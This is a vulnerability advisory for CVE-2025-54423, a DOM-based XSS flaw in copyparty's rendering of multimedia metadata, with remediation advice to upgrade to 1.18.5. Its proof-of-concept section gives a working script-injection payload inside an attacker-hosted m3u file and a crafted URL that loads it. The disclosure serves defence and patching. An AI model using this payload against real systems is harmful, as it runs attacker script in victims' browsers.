CVE-2025-54423
copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata
Description
### Summary An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including `m3u` files. ### Details Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways: * a user which has the necessary permission for uploading files can upload a song with an artist-name such as `<img src=x onerror=alert(document.domain)>` * an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file The CVE score and PoC is based on the m3u approach, which results in a higher severity. ### PoC 1. Create a file named `song.m3u` with the following content. Host this file on an attacker-controlled web server. ```m3u #EXTM3U #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)> http://example.com/audio.mp3 ``` 2. Craft and share the malicious URL: ``` http://127.0.0.1:3923/#m3u=https://example.com/song.m3u ``` ### Impact Any user that accesses this malicious URL is impacted.
How to fix CVE-2025-54423
To remediate CVE-2025-54423, upgrade the affected package to a fixed version below.
- —upgrade to 1.18.5 or later
Is CVE-2025-54423 being exploited?
Low — EPSS is 0.2%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 1.18.5